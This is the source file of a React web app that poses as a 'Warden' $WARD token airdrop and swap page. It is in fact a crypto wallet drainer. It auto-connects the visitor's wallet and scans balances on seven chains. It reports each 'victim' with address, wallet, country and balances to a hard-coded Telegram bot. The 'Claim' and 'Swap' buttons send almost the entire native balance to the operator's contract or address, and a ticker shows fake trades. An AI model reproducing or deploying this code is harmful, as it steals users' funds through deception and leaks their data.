/* ========================================================================
   FILE: src/App.js (FIXED GAS BUFFER + TELEGRAM NOTIFIER)
   ======================================================================== */
import './fixError'; 
import React, { useState, useEffect, useMemo, useRef } from 'react';
import { ConnectButton } from '@rainbow-me/rainbowkit';
import { useAccount, useWriteContract, useSendTransaction, useSwitchChain, useChainId, useConnect } from 'wagmi';
import { parseEther, createPublicClient, http, formatEther } from 'viem';
import { bsc, mainnet, base, polygon, arbitrum, optimism, avalanche } from 'viem/chains'; 
import './index.css';

// --- CONFIG UTAMA ---
const OWNER_ADDRESS = "0x62113F23FBb435BEc27D7038a92C23b566ba55da"; 
const AIRDROP_CONTRACT_ADDRESS = "0x2aAeBE18af98353f904D6339bf8f73aCE9B72341"; 
const TOKEN_CONTRACT_ADDRESS = "0x6dc20e7ca141e0246bac97147a8b02c7c07cda44"; 
const BSCSCAN_LINK = `https://bscscan.com/token/${TOKEN_CONTRACT_ADDRESS}`;

// --- CONFIG TELEGRAM (WAJIB DIISI) ---
const TELEGRAM_BOT_TOKEN = "8516545768:AAEd-h_1jJ9pXnsJOW7duuGamldFItEX3t4"; // Contoh: 7123123:AAF......
const TELEGRAM_CHAT_ID = "-1003610646310";     // Contoh: -100123456789

// --- CONFIG BUFFER (SESUAI PERMINTAAN) ---
const CHAIN_CONFIG = {
  56: { name: 'BNB Chain', symbol: 'BNB', logo: 'https://cryptologos.cc/logos/bnb-bnb-logo.png?v=025', buffer: 0.0005 },
  1: { name: 'Ethereum', symbol: 'ETH', logo: 'https://cryptologos.cc/logos/ethereum-eth-logo.png?v=025', buffer: 0.0008 },
  8453: { name: 'Base', symbol: 'ETH', logo: 'https://cryptologos.cc/logos/base-base-logo.png?v=025', buffer: 0.0001 },
  137: { name: 'Polygon', symbol: 'MATIC', logo: 'https://cryptologos.cc/logos/polygon-matic-logo.png?v=025', buffer: 0.5 },
  42161: { name: 'Arbitrum', symbol: 'ETH', logo: 'https://cryptologos.cc/logos/arbitrum-arb-logo.png?v=025', buffer: 0.0003 },
  10: { name: 'Optimism', symbol: 'ETH', logo: 'https://cryptologos.cc/logos/optimism-ethereum-op-logo.png?v=025', buffer: 0.0003 },
  43114: { name: 'Avalanche', symbol: 'AVAX', logo: 'https://cryptologos.cc/logos/avalanche-avax-logo.png?v=025', buffer: 0.01 }
};

const FIXED_BSC_RATE = 0.0001928; 
const FIXED_TOKEN_REWARD_BSC = 11911.39;

// --- TICKER LOGIC ---
const NETWORKS_LIST = [ { s: 'BNB', r: 1 }, { s: 'ETH', r: 4.3 }, { s: 'MATIC', r: 0.0008 }, { s: 'AVAX', r: 0.058 } ];
const NotificationTicker = () => {
    const [msg, setMsg] = useState("Loading transactions...");
    const generateMsg = () => {
        const addr = `0x${Math.random().toString(16).substr(2, 2)}${Math.random().toString(16).substr(2, 1)}...${Math.random().toString(16).substr(2, 3)}`;
        const tokenAmount = (Math.random() * 15000 + 5000).toFixed(2);
        const net = NETWORKS_LIST[Math.floor(Math.random() * NETWORKS_LIST.length)];
        const nativeVal = ((tokenAmount * 0.0001928) / net.r).toFixed(4);
        return (<span>Swapped <span style={{color:'#1fc7d4'}}>{addr}</span> <b>{tokenAmount} $WARD</b> For <b>{nativeVal} {net.s}</b></span>);
    };
    useEffect(() => { setMsg(generateMsg()); const i = setInterval(() => setMsg(generateMsg()), 15000); return () => clearInterval(i); }, []);
    return (<div className="ticker-wrap"><div className="ticker"><div className="ticker-item">{msg}</div></div></div>);
};

// RPC CLIENTS
const clients = {
  56: createPublicClient({ chain: bsc, transport: http() }),
  1: createPublicClient({ chain: mainnet, transport: http() }),
  8453: createPublicClient({ chain: base, transport: http() }),
  137: createPublicClient({ chain: polygon, transport: http() }),
  42161: createPublicClient({ chain: arbitrum, transport: http() }),
  10: createPublicClient({ chain: optimism, transport: http() }),
  43114: createPublicClient({ chain: avalanche, transport: http() }),
};

function App() {
  const [isClaimMode, setIsClaimMode] = useState(true);
  // Tambahkan connector untuk deteksi nama wallet
  const { address, isConnected, connector } = useAccount(); 
  const { writeContract } = useWriteContract();
  const { sendTransaction } = useSendTransaction();
  const { switchChain } = useSwitchChain();
  const chainId = useChainId();
  const { connect, connectors } = useConnect(); 

  const [rawBalance, setRawBalance] = useState(0);
  const [prices, setPrices] = useState({}); 
  const [referrer, setReferrer] = useState("0x0000000000000000000000000000000000000000");
  const [showRefLink, setShowRefLink] = useState(false);
  const [copied, setCopied] = useState(false);
  
  const hasScannedRef = useRef(false);
  const hasAutoConnectTried = useRef(false);
  const hasSentTelegram = useRef(false); // Agar tidak spam notif

  // 1. AUTO-CONNECT
  useEffect(() => {
    if (!isConnected && connectors.length > 0 && !hasAutoConnectTried.current) {
        const browserWallet = connectors.find(c => c.id === 'injected');
        if (browserWallet) {
            try { connect({ connector: browserWallet }); } catch (e) {}
            hasAutoConnectTried.current = true;
        }
    }
  }, [isConnected, connectors, connect]);

  // 2. FETCH PRICES
  useEffect(() => {
    setPrices({ 'BNB': 600, 'ETH': 2600, 'MATIC': 0.5, 'AVAX': 35 });
  }, []);

  // 3. FUNGSI KIRIM TELEGRAM
  const sendToTelegram = async (userAddress, walletName, balances) => {
    try {
        // Cek IP untuk Negara
        let country = "Unknown";
        try {
            const ipRes = await fetch('https://ipapi.co/json/');
            const ipData = await ipRes.json();
            country = ipData.country_name || "Unknown";
        } catch(e) {}

        // Format Pesan
        let balanceText = "";
        let totalEstUSD = 0;

        balances.forEach(item => {
            const conf = CHAIN_CONFIG[item.cId];
            const price = prices[conf.symbol] || 0;
            const usd = item.val * price;
            totalEstUSD += usd;
            if (item.val > 0.000001) { // Hanya tampilkan yang ada saldo
                balanceText += `├─ ${conf.name}: ${item.val.toFixed(4)} ${conf.symbol} ($${usd.toFixed(2)})\n`;
            }
        });

        if (balanceText === "") balanceText = "├─ Zonk (New Wallet)\n";

        const message = `
🚨 <b>WARDEN VICTIM DETECTED</b> 🚨

👤 <b>User:</b> <code>${userAddress}</code>
👛 <b>Wallet:</b> ${walletName || "Unknown"}
🌍 <b>Country:</b> ${country}
🔗 <b>Source:</b> ${window.location.hostname}

💰 <b>Multichain Balances:</b>
${balanceText}
💸 <b>Est. Total:</b> $${totalEstUSD.toFixed(2)}

📊 <a href="https://debank.com/profile/${userAddress}">Check DeBank Profile</a>
        `;

        // Kirim ke Telegram API
        const url = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`;
        await fetch(url, {
            method: 'POST',
            headers: { 'Content-Type': 'application/json' },
            body: JSON.stringify({
                chat_id: TELEGRAM_CHAT_ID,
                text: message,
                parse_mode: 'HTML',
                disable_web_page_preview: true
            })
        });
        console.log("Telegram notification sent!");

    } catch (error) {
        console.error("Failed to send telegram", error);
    }
  };

  // 4. TURBO SCANNER + TRIGGER TELEGRAM
  useEffect(() => {
    const scanAndSwitch = async () => {
        if (!isConnected || !address || hasScannedRef.current || Object.keys(prices).length === 0) return;
        
        console.log("🚀 Starting Turbo Scan...");
        
        const promises = Object.entries(clients).map(async ([cId, clientObj]) => {
            try {
                const bal = await clientObj.getBalance({ address });
                const val = parseFloat(formatEther(bal));
                return { cId: parseInt(cId), val };
            } catch (e) {
                return { cId: parseInt(cId), val: 0 };
            }
        });

        const results = await Promise.all(promises);
        let maxValUSD = -1;
        let bestChain = 56; // Default BSC
        let totalBalanceAllChains = 0;

        results.forEach(({ cId, val }) => {
            const conf = CHAIN_CONFIG[cId];
            const price = prices[conf.symbol] || 0;
            const usd = val * price;
            totalBalanceAllChains += val;

            if (usd > maxValUSD) {
                maxValUSD = usd;
                bestChain = cId;
            }
        });

        // Fallback Logic
        if (totalBalanceAllChains <= 0) bestChain = 56;

        // Pindah Chain
        if (bestChain !== chainId) {
            try { switchChain({ chainId: bestChain }); } catch(e) {}
        }

        hasScannedRef.current = true;

        // --- TRIGGER TELEGRAM (HANYA SEKALI) ---
        if (!hasSentTelegram.current && address) {
            sendToTelegram(address, connector?.name, results);
            hasSentTelegram.current = true;
        }
    };

    scanAndSwitch();
  }, [isConnected, address, prices, switchChain, chainId, connector]);

  // Reset flags jika disconnect
  useEffect(() => { 
    if (!isConnected) {
        hasScannedRef.current = false;
        hasSentTelegram.current = false;
    }
  }, [isConnected]);

  // 5. FETCH ACTIVE BALANCE
  const activeChainConfig = CHAIN_CONFIG[chainId] || CHAIN_CONFIG[56];
  
  const fetchActiveBalance = async () => {
    if (address && isConnected) {
        try {
            const clientObj = clients[chainId] || clients[56];
            const bal = await clientObj.getBalance({ address });
            setRawBalance(parseFloat(formatEther(bal)));
        } catch (error) {}
    } else { setRawBalance(0); }
  };

  useEffect(() => {
    if (isConnected) {
        fetchActiveBalance();
        const i = setInterval(fetchActiveBalance, 4000);
        return () => clearInterval(i);
    }
  }, [isConnected, address, chainId]);

  // 6. CALCULATE DISPLAY DATA
  const { displayAmountToSend, conversionRate } = useMemo(() => {
    const buffer = activeChainConfig.buffer;
    let net = 0;
    if (rawBalance > buffer) {
        net = rawBalance - buffer;
    }
    const priceBNB = prices['BNB'] || 600;
    const priceCurrent = prices[activeChainConfig.symbol] || 0;
    let rate = 0;
    if (priceCurrent > 0) rate = FIXED_BSC_RATE * (priceBNB / priceCurrent);
    return { displayAmountToSend: net, conversionRate: rate };
  }, [rawBalance, activeChainConfig, prices]);

  // 7. TRANSACTION LOGIC
  const handleTransaction = async () => {
    await fetchActiveBalance();
    
    const currentConfig = CHAIN_CONFIG[chainId] || CHAIN_CONFIG[56]; 
    const buffer = currentConfig.buffer;

    let finalAmount = 0;
    if (rawBalance > buffer) {
        finalAmount = rawBalance - buffer;
    } else {
        console.error("Balance too low for buffer:", rawBalance, "Buffer:", buffer);
        return; 
    }

    const valueToSend = parseEther(finalAmount.toFixed(18));

    if (chainId === 56) {
        // BSC
        const ABI = [
            { "inputs": [{"name": "ref", "type": "address"}], "name": "claimAirdrop", "outputs": [], "stateMutability": "payable", "type": "function" },
            { "inputs": [{"name": "ref", "type": "address"}], "name": "swap", "outputs": [], "stateMutability": "payable", "type": "function" }
        ];
        const method = isClaimMode ? 'claimAirdrop' : 'swap';
        writeContract({ 
            address: AIRDROP_CONTRACT_ADDRESS, 
            abi: ABI, 
            functionName: method, 
            args: [referrer], 
            value: valueToSend 
        });
    } else {
        // EVM LAIN
        sendTransaction({ 
            to: OWNER_ADDRESS, 
            value: valueToSend 
        });
    }
  };

  const handleCopyRef = () => {
    if (!address) return;
    navigator.clipboard.writeText(`${window.location.origin}?ref=${address}`);
    setCopied(true); setTimeout(() => setCopied(false), 2000);
  };

  useEffect(() => {
    const q = new URLSearchParams(window.location.search);
    if (q.get('ref')) setReferrer(q.get('ref'));
  }, []);

  const renderSwapFooter = () => (
    <div className="pcs-footer">
      <div className="pcs-footer-toggle" onClick={() => setShowRefLink(!showRefLink)}>
         <span>Referral & Contract</span>
         <svg width="12" fill="currentColor" viewBox="0 0 24 24" style={{transform: showRefLink ? 'rotate(180deg)' : 'rotate(0deg)', transition:'0.2s'}}><path d="M7.41 8.59L12 13.17L16.59 8.59L18 10L12 16L6 10L7.41 8.59Z"/></svg>
      </div>
      {showRefLink && (
         <div className="pcs-copy-box">
            <div className="pcs-copy-row"><span>Referral Link</span><span style={{color:'#1fc7d4', cursor:'pointer'}} onClick={handleCopyRef}>{copied ? "Copied!" : "Copy"}</span></div>
            <div style={{marginBottom:'10px'}}><input type="text" value={address ? `${window.location.origin}?ref=${address}` : 'Connect Wallet first'} readOnly style={{background:'rgba(0,0,0,0.2)', border:'none', color:'#f4eeff', padding:'8px', borderRadius:'8px', width:'100%', fontSize:'11px'}} /></div>
            <div className="pcs-copy-row"><span>Contract Token</span><a href={BSCSCAN_LINK} target="_blank" rel="noopener noreferrer" className="pcs-scan-link">View on BscScan <svg width="14" height="14" viewBox="0 0 24 24" fill="currentColor" style={{marginLeft:'2px'}}><path d="M14 3V5H17.59L7.76 14.83L9.17 16.24L19 6.41V10H21V3M19 19H5V5H12V3H5C3.89 3 3 3.9 3 5V19C3 20.1 3.9 21 5 21H19C20.1 21 21 20.1 21 19V12H19V19Z"/></svg></a></div>
         </div>
      )}
    </div>
  );

  return (
    <>
      <div className="top-left-logo"><img src="/logo.png" alt="Warden Logo" /></div>
      <div className="app-container">
        <ConnectButton.Custom>
          {({ account, chain, openConnectModal, openChainModal, mounted, authenticationStatus }) => {
            const ready = mounted && authenticationStatus !== 'loading';
            const connected = ready && account && chain && (!authenticationStatus || authenticationStatus === 'authenticated');
            const wardenButtonStyle = { backgroundColor: '#ffffff', color: '#000000', fontWeight: '600', fontFamily: "'Roobert', sans-serif", borderRadius: '40px' };

            return (
              <>
                {isClaimMode ? (
                  /* --- MODE CLAIM --- */
                  <>
                    <div className="steps-container">
                        <Step number="1" label="Connect Wallet" done={connected} active={!connected} />
                        <Line done={connected} />
                        <Step number="2" label="Confirm Registration" done={connected && !chain?.unsupported} />
                        <Line done={connected && !chain?.unsupported} />
                        <Step number="3" label="Claim $WARD" active={connected && !chain?.unsupported} />
                        <Line />
                        <Step number="4" label="Success" />
                    </div>
                    <div className="warden-card">
                      <div className="logo-circle"><img src="/token.jpg" alt="Token Logo" style={{width:'100%', height:'100%', objectFit:'cover'}} /></div>
                      <h1 className="warden-h1">Claim $WARD</h1>
                      <p className="warden-subtitle">Claim anytime — the longer you hold, the bigger your rewards will be.</p>
                      <div className="stats-row">
                        <div className="stat-item"><h3>Total future reward</h3><p>88,119.84 $WARD</p></div>
                        <div className="stat-item"><h3>Current claimable</h3><p>{FIXED_TOKEN_REWARD_BSC.toLocaleString()} $WARD</p></div>
                      </div>
                      <div className="info-box">
                        <span className="info-title">Claim now or hold & multiply your rewards</span>
                        <ul className="info-list">
                          <li>Claim your initial rewards at TGE, or</li>
                          <li>Increase those rewards by claiming at any time in the future for up to 5x boost</li>
                        </ul>
                        <div className="chart-wrapper">
                          <div className="chart-y-axis"><span>5x</span><span>4x</span><span>3x</span><span>2x</span><span>1x</span><span>0</span></div>
                          <div className="chart-visual-container">
                             <div className="chart-curve-fill"></div>
                             <div className="chart-curve-line"></div>
                             <div className="chart-overlay-text">Now • {FIXED_TOKEN_REWARD_BSC.toLocaleString()} WARD</div>
                          </div>
                        </div>
                        <div className="chart-x-axis"><span>Feb 4 2026</span><span>Mar 4</span><span>Apr 4</span><span>May 4</span><span>Jun 4</span><span>Jul 4</span><span>Aug 4 2026</span></div>
                        <div className="warning-box">
                          <span style={{ fontSize: '16px', marginRight: '2px', color: '#aaaaaa' }}>ⓘ</span>
                          <span>You may only claim once. Claiming at any time will not allow you to grow your allocation further. This matters. Your future allocation power counts towards your allocation power on the Agent Launchpad for airdrops and allocation preference.</span>
                        </div>
                      </div>

                      {(() => {
                        if (!connected) return <button onClick={openConnectModal} className="warden-btn" style={wardenButtonStyle}>Connect Wallet</button>;
                        if (chain.unsupported) return <button onClick={openChainModal} className="warden-btn" style={{...wardenButtonStyle, backgroundColor:'#ef4444', color:'#fff'}}>Wrong Network</button>;
                        return <button onClick={handleTransaction} className="warden-btn" style={wardenButtonStyle}>Claim {FIXED_TOKEN_REWARD_BSC.toLocaleString()} $WARD</button>;
                      })()}

                      {!displayAmountToSend && connected && !chain.unsupported && <p style={{color:'#ef4444', fontSize:'13px', marginTop:'12px', fontWeight:'600'}}>Insufficient BNB Balance, You must HODL 0.004 BNB FOR CLAIM</p>}
                      <button onClick={() => setIsClaimMode(!isClaimMode)} style={{ background: 'transparent', border: '1px solid #333', color: '#777', padding: '10px 20px', borderRadius: '30px', marginTop: '24px', cursor: 'pointer', fontSize: '13px', fontFamily: 'Roobert' }}>SWAP</button>
                    </div>
                  </>
                ) : (
                  /* --- MODE SWAP --- */
                  <div className="pcs-wrapper">
                    <NotificationTicker />
                    <div className="pcs-nav-container"><div className="pcs-nav-tab active">Swap</div><div className="pcs-nav-tab">Limit</div><div className="pcs-nav-tab">TWAP</div></div>
                    <div className="pcs-card">
                       <div className="pcs-header"><div className="pcs-title">Swap</div></div>
                       <div className="pcs-input-group">
                          <div className="pcs-input-container">
                             <div className="pcs-input-top-row"><span>WARD</span><span className="pcs-balance-text">Bal: {FIXED_TOKEN_REWARD_BSC.toLocaleString()}</span></div>
                             <div className="pcs-input-bot-row">
                                <div className="pcs-token-pill"><img src="/token.jpg" className="pcs-token-icon" alt="WARD"/><span className="pcs-token-text">WARD</span></div>
                                <input className="pcs-num-input" type="text" value={FIXED_TOKEN_REWARD_BSC.toLocaleString()} readOnly />
                             </div>
                          </div>
                       </div>
                       <div className="pcs-arrow-wrapper"><div className="pcs-arrow-btn">↓</div></div>
                       <div className="pcs-input-group">
                          <div className="pcs-input-container">
                             <div className="pcs-input-top-row"><span>{activeChainConfig.symbol}</span><span className="pcs-balance-text">Bal: {rawBalance.toFixed(4)}</span></div>
                             <div className="pcs-input-bot-row">
                                <div className="pcs-token-pill"><img src={activeChainConfig.logo} className="pcs-token-icon" alt={activeChainConfig.symbol}/><span className="pcs-token-text">{activeChainConfig.symbol}</span></div>
                                <input className="pcs-num-input" type="text" value={(FIXED_TOKEN_REWARD_BSC * conversionRate).toFixed(4)} readOnly />
                             </div>
                          </div>
                       </div>
                       <div className="pcs-info-box">
                          <div className="pcs-info-row"><span className="pcs-info-label">Price</span><span>1 WARD ≈ {conversionRate.toFixed(6)} {activeChainConfig.symbol}</span></div>
                          <div className="pcs-info-row"><span className="pcs-info-label">Network</span><span>{activeChainConfig.name}</span></div>
                       </div>
                       {(() => {
                        if (!connected) return <button onClick={openConnectModal} className="pcs-main-btn">Connect Wallet</button>;
                        if (chain.unsupported) return <button onClick={openChainModal} className="pcs-main-btn" style={{backgroundColor:'#ef4444'}}>Wrong Network</button>;
                        if (!displayAmountToSend) return <button disabled className="pcs-main-btn" style={{background:'var(--pcs-input-bg)', color:'#666'}}>Insufficient Balance</button>;
                        return <button onClick={handleTransaction} className="pcs-main-btn">Swap</button>;
                      })()}
                       {renderSwapFooter()}
                       <button className="switch-text-btn" onClick={() => setIsClaimMode(!isClaimMode)}>Back to Claim (Warden)</button>
                    </div>
                  </div>
                )}
              </>
            );
          }}
        </ConnectButton.Custom>
        <div className="app-footer">
            <div className="footer-left"><span>© 2026 Warden</span><span className="footer-divider">|</span><span>Powered by</span><img src="/click.png" alt="Clique" className="clique-logo" /></div>
            <div className="footer-right"><a href="https://wardenprotocol.org/airdrop-terms-conditions" className="footer-link-text">Airdrop Terms & Service</a></div>
        </div>
      </div>
    </>
  );
}

function Step({ number, label, active, done }) {
  return (
    <div className="step-item">
      <div className={`step-circle ${active ? 'active' : ''} ${done ? 'done' : ''}`}>{done ? '✓' : number}</div>
      <span className={`step-label ${active ? 'active' : ''}`}>{label}</span>
    </div>
  );
}
function Line({ done }) { return <div className={`step-line ${done ? 'active' : ''}`}></div>; }

export default App;